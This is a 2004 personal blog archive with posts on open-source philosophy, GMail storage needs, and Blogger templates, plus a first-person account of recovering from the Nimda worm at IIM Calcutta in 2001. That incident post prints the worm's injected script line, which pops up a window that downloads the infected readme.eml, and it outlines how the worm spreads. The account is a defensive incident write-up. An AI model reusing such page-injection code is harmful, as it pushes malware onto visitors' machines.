November 22, 2004

The Philosophy of the Free & Open

And how it impacts us.

Open Source, is not about Linux. It is not about Apache [1], mySQL [2] or GNOME [3]. In fact, it is not about software at all. Rather it is a philosophy and a belief. A belief that is not only old, but is rather clichéd and goes – “The pen is mightier than the sword”.

The Internet has breathed a new life into this saying, granting it an awesome power. Power enough, that a few individuals, scattered across vast distances, armed with nothing but knowledge, are now planning world-domination.

This article is an idle walk down the annals of history and the corridors of philosophy [4], to play with the questions “who” and “why”. Who are these people, and why-o-why are they doing what they are doing.

Free as in Freedom

The words “free software” or “open source” typically evoke responses saying, “It is available without charge”. While true, it is a quirk with the English language [5] that prevents us from seeing the other, truer meaning. English uses the same word “free” to denote both “without a price to pay” and “freedom to do what you wish to do”. It is the second meaning that truly symbolizes all that this movement stands for. The interpretation of this freedom makes one appreciate that this philosophy is not restricted to software at all. It in fact extends a lot wider.

Imagine a bunch of kids given a huge white canvas, spotlessly clean, and spray cans of red paint. More often than not, the kids will spray away, randomly on the canvas. What if, instead, the kids sat down and started to painstakingly detail the verses of the Iliad or the Ramayana. This is seemingly inconceivable, because of the apparent human nature of preferring the playful to the ordered, which is amplified to an extreme in a group. Directing a random group without either a stick or a carrot seems impossible.

However this impossibility is precisely what is manifesting over at Wikipedia [6]. Wikipedia is an “Open Encyclopedia” where anyone can contribute to any article, without even being logged in. Furthermore, any change perpetrated is visible instantly on the web, without being checked, corrected or in any other fashion moderated by anyone. Given this absolute freedom you would assume chaos – errors in content, clumsiness, information biases, ineptitude or plain vanilla vandalism. However the Wikipedia is one of the web’s most searched encyclopedias, channeling the expertise of thousands to millions more.

Slashdot [7] is another example of this channeled freedom. Despite its obvious biases and pedigree, it remains by far the best example of a publicly moderated discussion board.

The philosophy that drives a hacker of Linux is the same that drives a contributor in Wikipedia. Freedom is not always a bad thing. It does not always result in chaos but begets responsibility and motivates productivity. This freedom is a core tenet of the philosophy of the Open Source movement. I could go on with other examples of the newsgroups [8] or the open courseware [9], but that would be unnecessary. Instead lets spend time tracing the roots of the free and open source philosophy.

In the beginning was the command line

With apologies to Neil Stephenson [10], we are talking about a time that was not too long ago. About three decades ago, the computer meant the PDP-10 [11] or a teletype-fed mainframe. Programming was about thinking in bits and bytes, while programs were meant to be shared, understood, debated upon and improved. Out of thin air and using 0s and 1s, a new science was being invented. C and C++ [12] were being developed, Unix was being coded [13] and software and hardware standards were being set.

The times were reminiscent of the Wild West; with its own tight knit groups, raw excitement and brave gun-wielding heroes. The difference was that the program now replaced the gun and the mainframe was the battlefield. It was this arena that the corporation was presently entering. With a promise to take computing to the masses companies were doing something that was unacceptable to the pioneers – “selling” software.

Richard Stallman [14] was an early pioneer. He believed that software was a universal tool and the source was its soul. Closing source or selling software was something that was utterly unacceptable to him. And he was prepared to do something about it. In 1984, the same year Apple Computer released the Macintosh, Stallman set up the GNU foundation [15].

GNU stands for GNU’s Not Unix, whose vision, satirically, was to provide a full, free version of UNIX. In 1984, UNIX was the predominant OS and was available in a mind-boggling variety of commercial flavors each fragmented from and incompatible with another. The Personal Computer as a product was almost non-existent then and as a concept was still a joke. GNU therefore sought to “liberate” the entire computing world by providing the fundamental tool – the Unix OS – for free.

UNIX-like operating systems are built of two basic parts – the kernel and the utilities. The kernel is the core, which handles the very low level interactions with the hardware, memory and the processor. It only provides a very basic functionality that is converted into something useful by the utilities. UNIX, by its rich heritage has a multitude of tools for every activity from network management to text processing.

While some members of the GNU started recreating the rich toolset, others started work on the kernel, called the HURD [16]. In time the tools started rolling out, each free, available with the source, providing functionality similar to or better than those provided by the various commercial Unices. The development of the kernel was however heading nowhere. The late 1980’s saw the advent [17] of the true Personal Computer – cheap Intel hardware running DOS or the early Windows.

Without the kernel, and a rapidly dying breed of mainframes unable to survive the onslaught of the PC, the GNU movement suddenly faced irrelevance.

In 1991, Linus Torvalds, a 21-year-old computer science student at the University of Helsinki, decided that his personal operating system, Minix, a Unix-look-alike was not good enough. He was pretty sure he could write something better and attempted to code his own. But in doing this he turned to the Internet for help and guidance [18]. He also put the source code of his attempts back on the net for comments and correction. And from this sprang the kernel, which we now know as Linux. Linux as a kernel could run on the same contemporary hardware used by DOS and Windows. Further, being based on the same standard as that of the older UNIX, Linux could run programs written for the older UNIX kernels.

For GNU, this meant that their long wait for a free kernel was finally over. For Linux this meant that it finally had programs that could actually utilize the kernel that was being built. GNU/Linux became the complete ‘free’ operating system that Richard Stallman and a number of others had been dreaming of.

On the shoulders of Giants

It is people who ultimately define the success of any idea. So it is with the idea of the “open”. Among the multitude of programmers, users, fans and followers of the free and open source movements, there are some who have helped define the soul of the FOSS movement. There are some like Richard Stallman, who are fanatically devoted to the idea of free software, while others like Linus Torvalds, have been the silent, media-shy icons of the movement. There however are others who have helped give a more balanced view of the philosophy of FOSS.

Eric S. Raymond is a Linux evangelist and the author of three extremely powerful essays [19] on the philosophy of Free and Open Source. Called “The Cathedral and the Bazaar”, “Homesteading the Noosphere” and “The Magic Cauldron”, these essays present a very logical account of the FOSS philosophy. These essays discuss the social, economic and personal drives, reasons and justifications for the success of the open approach. Bruce Perens is another Linux advocate whose article “The Open Source Definition” [20] is a fundamental account of the principle of the FOSS camp. These essays explore the novel effect of having a loosely bound; part time volunteers drive projects of unimaginable magnitude and give it all away for free.

One notable side effect of the having such a diverse and widespread fan base is that villains are instantly vilified and secrets don’t remain secret for long. Take the example of the famous “Halloween Documents” [21].

Microsoft, during Halloween 1998, commissioned an internal strategy memorandum on its responses to the Linux/Open Source Phenomenon. Unfortunately, it leaked, and within days was all over the Internet being taken apart by numerous FOSS advocates. Microsoft was always acknowledged to be the directly affected party because of the FOSS, but it was till then more of a cold war. The Halloween documents changed all that. Open Source advocates openly condemned Microsoft. Microsoft slowly started realizing that FOSS was rapidly changing from being a fringe movement to something that directly threatened it. It responded by sowing, what is now known as, FUD (Fear, Uncertainty and Doubt) in the minds of its customers. For the first time Microsoft directly acknowledged [22] that Linux had the capacity to unseat it, and started attacking the fundamental value propositions [23] of Linux and the FOSS.

It is also about this time that the mainstream press started increasing its coverage of the FOSS. The coverage was initially about Linux, the free replacement of Unix. Then it was about the sustainability of the Open Source as a Business model. And lately it is about David Vs Goliath – FOSS Vs Microsoft.

The press is an expression of popular opinion. Complementally the press forms popular opinion. And the popular opinion, therefore, weighs heavily on portraying FOSS as the David in the David Vs Goliath story.

This is where we come in

As long as we restrict our view of the FOSS movement to the software it generates, this popular opinion would seem perfectly reasonable. However if we realize that the philosophy of FOSS extends beyond the mere products of the FOSS movement, we begin to realize the nature of our relationship with it. Without too great a risk of generalization, the true nature of the spirit and philosophy of the FOSS is nothing short of the Internet itself.

The philosophy if FOSS is about freedom, freedom defined as “libre” – lack of constraints. It is a spirit of sharing and collaboration. It is a spirit that places quality above other considerations. It is a spirits that drives and is driven by a free flow of ideas. It is a philosophy that considers information supreme.

Every time we search the Internet for tips we are appealing to the philosophy of Open Source. Every code snippet, article, comparative analysis, forum on the Internet is driven by this philosophy. Every self-taught computer user is a product of the philosophy of the Open Source.

To consider this movement and the change it entails as anything less than mammoth would be childish. It involves a fundamental shift in our perception of the business of Information Technology itself. However, the change is upon us. It is now up to us to either respond proactively or to passively let events take the lead in changing us.

References

[1] http://www.apache.org/
[2] http://www.mysql.com/
[3] http://www.gnome.org/
[4] http://www.gnu.org/philosophy/philosophy.html
[5] http://www.gnu.org/philosophy/categories.html#FreeSoftware
[6] http://www.wikipedia.org/
[7] http://slashdot.org/
[8] http://groups.google.com/
[9] http://ocw.mit.edu/index.html
[10] http://www.cryptonomicon.com/beginning.html
[11] http://en.wikipedia.org/wiki/PDP-10
[12] http://www.research.att.com/~bs/C++.html
[13] http://www.bell-labs.com/history/unix/
[14] http://www.stallman.org/
[15] http://www.gnu.org/
[16] http://www.gnu.org/software/hurd/hurd.html
[17] http://www.geocities.com/n_ravikiran/write008.htm
[18] http://www.geocities.com/n_ravikiran/write003a.htm
[19] http://www.catb.org/~esr/writings/cathedral-bazaar/
[20] http://perens.com/Articles/OSD.html
[21] http://www.opensource.org/halloween/
[22] http://news.com.com/2100-1001_3-253320.html
[23] http://www.microsoft.com/mscorp/facts/default.asp

Document Changes
November, 22, 2004: First published version.

The gig for the Gigabyte

And how GMail might become just another free email provider

GMail, seems to have opened the floodgates for email storage. And while it is still in its beta stage, quite a few other free email providers are threatening to take away the crucial popular advantage that GMail seems to offer.

We will look at the issue in two sections - first we will try to understand the big ado about the 1 GB email service. Then we will look at how this affects GMail.

The Gigabyte fallacy

Ever since GMail came with the email for life offer, everyone seems to be falling head over heels in telling everyone that 1 GB of email space is good, and in other words that we all need 1 GB of email storage. Though 1 GB is good, it is like the offer at your favourite restaurant - "Eat all that you can and pay your usual". The problem with such an offer is this - you just cannot eat any more just because it is available.

Email users are typically of three types - the desktop user, the home user and the kiosk user. These are non standard terms, more of relevance to this article.

The desktop user is a user who does not use the webmail. He has a desktop email client and users a service provider to connect to. We assume that this user is one of the heaviest users of email.

The home user connects to the Internet using a personal/dedicated machine and has an alternative disk storage without having the Internet connectivity enabled. This user uses webmail and typically is a lighter user than the desktop user.

The kiosk user is user who uses a public machine and a public connection. Such a user does not own any disk space and cannot access any data without having a live Internet connectivity.

Lets look at how long it takes each of these users to rake up 1000 MB or 1 GB on their email accounts. We assume that a desktop user typically adds 1 GB every year to the size of his inbox. Taking into account that the usage might not be dedicated and to err on the conservative side, this is about 400 kb every hour. We assume that a home user is half as active in using email and a kiosk is one-fourth as active. This means that a home user takes 4.5 years to rake up a GB while a kiosk user takes 16 years to make 1 GB.

Profile
Usage Factor
Hours / week
MB / Week
Weeks to 1 G
Years
Desktop user 1 45 18 55.5 1
Home user 0.5 21 4.2 238 4.6
Kiosk user 0.25 12 1.2 833 16

Assuming a 1:3 split between the Home user and the Kiosk user, we have, on an average 13.2 years for users to hit their 1 GB mark. A lot of things can happen during this time. More importantly this means that the webmail provider only has to increase his inbox size only up to 75 MB per subscriber and need not gear up to 1000 MB anytime in the near future.

In short this means that the Gigabyte is not as huge as it is made out to be. The actual usage of it might be a lot lesser than even these numbers suggest. There is hence little that is actually different in the Gigabyte rush.

However the only thing that will severely affect these numbers is the usage patterns. Unless GMail becomes the next biggest file sharing network things might change. Again, as long as the bottleneck is the network and not storage, things might not change all that much.

Document Changes
November, 22, 2004: First published version.

When Things suddenly went wrong: w32.nimda.a@mm

The attack of the worm and the response.

This is a description of the Nimda virus attack on the official web site of Indian Institute of Management, Calcutta, on 18th September, 2001 and the subsequent response by the student system administrator team.

I was in my room, preparing for a course submission two days away, when the first alarm trickled down to me. I was struggling with a VB project, with Megadeth having sole control of my ear drums, when my neighbor Vipul, interrupted me. He was pretty incomprehensible at first, but slowly it dawned on me that I was supposed to log onto the institute web site.

As soon as I logged onto the site I knew something was wrong. We had left it safe and sound, not more than two hours ago. But now as soon as the page came up, a second window popped up and requested the download of a "readme.eml" file. I knew that eml files were used to save emails by Outlook and Outlook Express. I hoped against hope, that the eml file had something to do with my open Outlook, but very soon I was disabused.

I opened a second page on the web site, which also resulted in the pop up and download of the same "readme.eml" file. Twice was definitely no coincidence. Fighting that sinking feeling, my hope B was that the site may have been hacked or was under attack. I had to look for something, either confirming or denying this hypothesis. And the only clue I had was the eml file. Using Outlook to figure out the contents of the file showed me that there was indeed an executable file "readme.exe" as a attachment within the eml file.

The existence of the attachment caused a variety of alarms bells to go off in unison. Firstly it definitely looked like a virus, and secondly it was propagating from the web site and not via email. That morning, I had read in the morning about another variant of the 'code red' virus that was reportedly ready to start damage. Fearing the worst, my next steps were clear - I had to be at the server room physically and not in my room trying to do anything remotely. I called Vipul to join me and hurried to the main server room.

Why I was spared

Thinking back, it was pretty reckless of me to try to get to the details of the eml file in my room. But I eventually escaped infection - by nothing more than pure luck. A few days ago, my computer had been unceremoniously powered off a number of times by the Electricity corporation of West Bengal forcing me to reinstall Windows. As a result of this I ended up downgrading my Internet Explorer from the newer 5.5 version to the default 5 version that came bundled with Win98. As we will see later, the reinstall was a blessing in disguise. If this had not been the case, I would have been cleaning my own machine and saving my VB projects, instead of being free to work on just the main server.

The Server room

I was greeted at the server room by an extremely sluggish main server. This was a Compaq Proliant ML 350 running Windows NT 4. It took more than two minutes just to get to the logon screen. And all the while I could clearly see the hard drive thrashing. I was sorely tempted to switch off the machine and get it offline so that I could safely start it back up to see what damage had been done. But knowing nothing more about what was happening or the cause, I was reluctant to take any drastic measures. I continued to try to get the machine back in control.

By the time I finally got to the Shell, there was no one there. Explorer was dying intermittently and Dr.Watson (the crash recovery program on NT) was spawning all over the place. Then I found the one tool that differentiated the NT line from Windows 9x - the Task manager. Quickly I brought it up and killed off the erring Explorer and all the goody Dr.Watsons. Switching to the process list I saw dozens of processes running called - 'net'. As far as I knew, none was how many I should have seen. Meanwhile, there was no let up for the hard disk and the machine was barely responsive. In the next few minutes I slaughtered as many of the unnecessary processes as I could lay my mouse on and when I found the machine a tad quicker, sent it for a shutdown. Amidst screaming new processes the server went down.

Once I had the server down, there was a sense of peace. At least no further damage could be done. But God only knew what damage had already been done. At this point, I was still trying to convince myself that the whole thing was a hack of some kind, given the many 'net' processes and my ignorance. Yanking off the cable connecting the server I started it back in VGA mode, which was not even a safe mode, but hopefully would allow me to poke around. Dear old Explorer and Dr.Watson were up to the same antics as before. I killed each in turn and finally managed a stable Explorer as long as no one was double clicking programs.

When I finally got to the root directory and opened the default.asp file I saw that very wonderful line I would see over and over again over the next few days.

<html><script language="JavaScript">window.open("readme.eml",null, "resizable=no, top=6000, left=6000")</script></html>

What it did was what we had seen accessing the site - it downloaded the file "readme.eml" into the computers of anyone who happened to load the page. The file "readme.eml" were of course present in the directory. A quick check showed that all the default pages each of the subdirectories were similarly changed and the "readme.eml" file was present in all of them too.

If there was a need for confirmation, this was it. It seemed less and less like a hacker and more and more like a script from a virus or a worm. And I realized that I needed to talk to someone with ideas. We were already trawling the anti-virus sites, trying to see if they had any news. Meanwhile, I went looking for help.

Trying to find help in the campus, my worst fears came true. Across the campus, computers were behaving strangely, MS Word was not saving, and some machines wouldn't even boot. The story was remarkably same everywhere.

"Oh yeah, I did double click on that readme letter, and now it keeps popping up a warning message with 'OK' 'Details>>' buttons."

"I ran a live update yesterday and Norton at the moment does not detect any viruses."

"Every time I reboot things are becoming more and more difficult.".

I main server was down, and I had no luck in finding anyone who had more experience with the server. Sometime around this time, handwritten notices were put up across the campus urging students not to click on any files that said readme or looked like a letter.

What the hell is it?

Back alone in the server room I restarted the server and this time it was tougher controlling Explorer and its buddy Dr.Watson. Finally I killed both of them and started browsing using the command shell. Then I spent time figuring out where the actual executables of the various programs in the Start menu were and started all the monitors and the mmc console that I needed. Then another crack down on the various processes that I felt were unnecessary and including the HTTP and FTP servers. Now I needed more information.

Before we continue, a quick look at the setup we have in IIM Calcutta. We have an intranet of about 400 student machines and more including those of the professors. All are connected to the Internet through two proxies - one Novell and one Linux. The (affected) Web Server is not connected to the internal network directly. Apart from the two proxies there was a third machine running Linux (Red Hat 7.1) that also had two network cards, connected both to the intranet and the Internet. This was a temporary pilot server located next to the main Web Server, and formed the hub of repair activities over the next 35 hours. Presently the machine was being used to poll the web sites of Norton and Mcafee with little information. Further searching by Vipul too yielded the same result - nothing on this, yet.

In time we assembled a team that would be responsible for the task of not only getting the main Server up but also getting the entire extranet rid of the virus. With the team came experience and more ideas. Back on the main Server, the first readme.eml was created at 6:55 p.m. This was the time when the first of the default.asp files were last modified. Vipul's call to me was about an hour later. So the web server was online for a whole hour with the virus doing whatever it was supposed to do. We also discovered that all files that were named default or index had been modified over a period of 6-7 minutes starting 6:55 p.m., pointing to the involvement of a remote script. No script run in the same machine would have taken so long. Also files not linked to from the main web site, (like indexold.asp) were also affected. All fingers now pointed to an external infection through the IIS web server similar to Code Red.

With no further word from the anti-virus sites (so we thought) and a pathetically crippled system, most of us realized that this was not going to be a quick delete, change password recovery. Also reports were trickling in that the virus was rampant across the extranet. All drives were being put on active share and machines on the network with any sort of write permissions were being promptly written into. Looking at the way the payload was working, machines needed to be isolated. Taking a quick decision all the routers in the student section were manually switched off and the student section summarily went offline.

It was already late in the night and there was still no word from the anti-virus sites. Just to be sure we got a copy of the readme.eml file and ran checks on it with all the latest anti-virus packages available. None saw anything wrong with the file, not exactly in-line with what the rest of the student machines were seeing. Then I got probably the last brain wave before my brain shut down for the period - Slashdot. And sure enough it was the third article posted a while back, with links. Now we had a name, nay two, Nimda and Minda. And things were checking out and the worst fears were out in black and white. Even though it was quite late in the night, around 2:00 a.m. and there was one update posted by McAfee and none by Symantec. Our extranet ran on Norton and so things did not look any better. We decided to keep the routers down and the site offline till further notice. Now began the damage control exercises.

Damage Control

As is the case with any other network, the first need was to assure the populace that the steps taken were not to deprive them of the network usage but to protect them. Official notices went out that detailed what had happened and what needed to be done. Also a temporary deadline of 10 a.m. was communicated before we would consider getting the network back online. There was additional control to be done. With any campus as dependant as ours on the network, communication suddenly ground to a halt. The summer placement process came to a halt. Rumors were rampant with many quotes attributed to the team handling the crisis. Most had to countered and the account put straight. Then of course we had to assure all those who were infected that things would be fine and tomorrow would be a better day.

'Tomorrow', just a few hours later, was not a better day. The Mcafee update proved to be useless. That after uninstalling Norton from a number of affected machines, installing Mcafee, updating it and running system wide scans and deleting many of the affected files.

Almost 14 hours into the attack and we hadn't made much progress. The deadline for keeping the routers down was extended to 6:00 p.m. that evening and more notices were printed. Norton was quiet and we had to wait. But in the mean time things did get better, as more and more information was available and we also got some cleaning underway. The main advantage we had was the Linux machine on the network. We could get some parts of the plan in action.

The last backups we had of the entire web site were hopelessly out of date. So we got the infected site zipped up and ftp'ed over into the Linux machine. Ditto the database. Along went copies of the readme.eml file and the readme.exe file.

Information and Modus operandi

Running strings on the executable file was very informative. the strings program basically looks through the entire file and prints out the ASCII strings embedded in it. For example if you write a program that prints "Hello World" and made it into an executable, then strings on the executable would print this string out amongst others. Some excerpts of what we found are given here. Don't worry about understanding all of it, we did not either. But this definitely gave us some clues about the way this virus worked. Most of what we found was further validated by the others in the security business. You can check the other sources out by browsing through the links below.

A quick rundown on how the virus spreads. And since no one really knew what it 'does', apart from spreading that is, we will focus this discussion on how it spreads. Most of this information was culled from the various sources available at that time and from the experience in the campus. Most of the links on this page have more information, but that does not take away from that fact that this information was crucial to us at that time.

Nimda has three methods of propagation, all of which were visible in our setup. The first is the IIS vulnerability. This is the method that was used by the Code Red too. Infected servers randomly search for other servers running IIS and they are attacked. Some attack sequences that took place in vain on our Linux server are here. After the attack the host is forced to run scripts that updates the index*.* and default*.* files on their servers with the javascript string and also copies the readme.eml into the various sub directories. With this the infection of the host is complete. Of course the worm also takes protection against detection and removal in the host machine. Once infected the IIS servers are primarily involved in infecting other servers. Our web server first attacked the Linux server at 7:56 p.m. after being infected itself at 6:55 p.m. Since neither knew about the other, and assuming the initial choice is done randomly, this is the average time for the infected server to find another one in the same IP range.

The second and third modes of transmission occur on the Client machines, after they are infected. Client machines are infected when they visit any site that has been visited by Nimda. A new popup javascript window opens that downloads and opens directly without user intervention, the readme.eml file. This auto execute feature is a security bug in IE5.5 which was what was missing in my copy of IE5 and consequently saved my machine. Once the readme.exe is executed, which may not need you to double click on it, the wily program is inside and it does take a long time to clear out. More information is available on what it does all over the Web. Click on the several links that are at the end of the page.

The second mode is mass mailing. The worm comes with its own mailing engine. It uses MAPI to find addresses and mail itself to all your contacts. The the cycle repeats itself as soon as the target machines are compromised.

The third method is infection across the local network through Microsoft file sharing. It searches for writable shared folders and dumps copies of itself into them. While this does not automatically infect the machine, curiosity to see what the file contains ends up in the machine being compromised.

The long trudge back to normalcy

Back to the story. It was after noon and there were no cleaning tools available. We had volunteers hitting the F5 refresh button every few minutes on all the major anti-virus sites. At the same time we started looking at other methods of cleaning. Earlier we had taken a zip of the entire site and moved it into the Linux machine. Now we unzipped the whole site and started seeing what needed to be done if we were to have a clean version of the site ready for install. We put together a quick script that cleaned all the download lines in the affected asp and html files. You can see the script here. Then a single statement with find, deleted all the eml files from the entire site. Followed that up with a tar -cvzf and viola we had a clean version of the site to deploy - only no web server.

Our prayers were soon to be answered. Symantec did come out with the update, and we were back in action, on the main server. Hours of downloads and reinstallation of Norton anti-virus revealed that most of the new-found enthusiasm was in error. The patches for Code Red were not properly installed and there were other updates to be done before the cleaning was to succeed. The next few hours was spent in cycles of search/locate/download-into-linux-server/ftp-to-main-server/patch-and-update.

In the mean time we used the machine which had a controlled copy of the worm to cause infection and then clean with the anti-virus. This confirmed that the update might indeed work on workstations, though at that time it was highly ineffective on servers. Also our 6:00 p.m. deadline was upon us and we had to stretch it over to 10:00 p.m. that night. But now we had the anti-virus and also information on the propagation of the virus. Notices went out on the need to disable all file sharing from students' computers, infected or otherwise. Also a step-by-step drill was developed to be followed by all users at 10:00 p.m., when the network came back online. Notices went up and leaflets were distributed. Volunteers went out armed with three diskettes containing the updates, to all the critical computer installations in the campus to clean and secure them before the 10:00 p.m. deadline.

The struggle in the server room was in full swing. By the time most of the patches were in place (there was one we missed and would now know until much later) the server must have rebooted a billion times. Finally the virus scan was in place and we realized how lucky we were to have created a clean copy of the site ready for deployment. Norton was deleting all the files that it could not clean, and that included most of the startup pages in the web site, and all of its sections. Letting the scan run completely, and many times we were quite sure that we were clean.

The 10:00 p.m. deadline came and the routers went online. The net-starved IIM Calcutta community immediately came online. To make it easy for the users, and also to provide an alternative till the main web server came up, the Linux box mirrored all the updates, and information about the drill to clean infected computers.

The day crossed over into the next, and at 12:00 a.m. the site zip was in place and file copy was in progress. By around 1:00 a.m. the site tentatively came live, minus the cable connecting it to the network. after browsing a while and making sure that the site was indeed the way it was supposed to be, we went live.

By 2:00 a.m. we were back offline and deleting the admin.dll that had tftp'ed itself into the temp folder. Frantic searching located the missing patch. Patch-rinse-repeat. Now the server did hold but we did not have the energy to keep monitoring it or the guts to keep it online without supervision. So the server went back offline and we went to bed.

The next morning arrived without me in the server room. I was back with Megadeth at full blast trying to complete my Project in time that suddenly had 40 fewer hours to the deadline. But the news was that the freshly patched server was holding up and doing well. Of course a number of client machines are still infected and need to be cleaned. But so far we have not had a single report of late or cross infection.

(We got a 12 hour extension on the project submission and mine did go well in time. Thanks for asking anyway)

Related links

Symantec
Mcafee
Trend Micro Update
F-Secure virus definitions
Symantec Removal Tool
CERT Advisorywith a number of other links too.
Another Fight The TechRepublic battles

Document Changes
November 22, 2004: Essential rewrite of article stressing the central idea and new links too.
April 02, 2009: Updates and corrections.

November 19, 2004

New Blog templates

It is wonderful how a company makes a difference to a product. For all that dilbert says about companies, which I am sure I almost always agree with, it its own way the company is an indespensable part of getting something done. Yeah, it will always be slower than a motivated individual, but it will always be better than the majority of us randomly spending time who might effectively cancel each other out.



And I slowly start to believe that companies actually have a character of their own that rubs of very explicitly on its employees. Just a few days back I was writing to a groups of friends from way back in college. And they commented on how different I think. They asked me if my educations had anything to do with it. No. The company did.



Eerie, unacceptable, grossly unappropriate but true.



You might be wondering how this ties up to the heading. Well, I was looking through some of the options of blogger and somehow I felt that google was behind some of them. It may be the layout, the style, the wordings I really dont know. And additionally when blogger came out, it gave an awesome set of tools to make your own template. But a majority of us out here dont have the patience nor the expertise to make good templates for ourselves. We would depend to a great extent on templates given by blogger. And check out the awesome set of templates that are available now. I *think* google has something to do with it.



holding on to the me in the company

- ravi